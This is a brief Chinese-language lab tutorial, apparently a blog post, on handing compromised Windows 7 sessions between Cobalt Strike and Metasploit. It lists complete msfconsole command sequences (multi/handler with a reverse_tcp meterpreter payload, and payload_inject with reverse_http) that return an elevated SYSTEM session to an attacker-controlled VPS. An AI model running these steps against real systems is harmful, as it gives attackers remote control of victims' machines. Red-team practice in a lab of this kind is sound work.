实验环境

cs4.4(4.5版本不知道为啥实现不了)

cs服务器与msf在同一台vps上

本地win7虚拟机

cs派生会话给msf

首先cs正常上线win7，这就不多说了，然后说如何将会话派生给msf

cs准备

选择Foreign，这里可以选HTTP，也可以选HTTPS，host写msf主机ip，我这里就写vps的公网ip，端口随意，不要被占用即可

msf准备

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost x.x.x.x     #vps ip地址
set lport 2333        #端口和cs Foreign相同
exploit

会话传递

然后选择刚刚建立的监听器Foreign HTTP，选择后就会看到msf接收到会话了

msf派生会话给cs

msf先正常上线win7主机，我这里用刚刚cs派生过来的会话，提权后再派生给cs

cs准备

能正常使用的监听器，我这里cs和msf都在一个服务器上，所以都是vps的ip

会话传递

这里我把提权后的会话返回给cs

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost x.x.x.x   # CS服务端IP
set lport 1234       # CS服务端监听器的端口
set DisablePayloadHandler True
set PrependMigrate True
set session 2  # 会话id
run

可以看到成功返回了system会话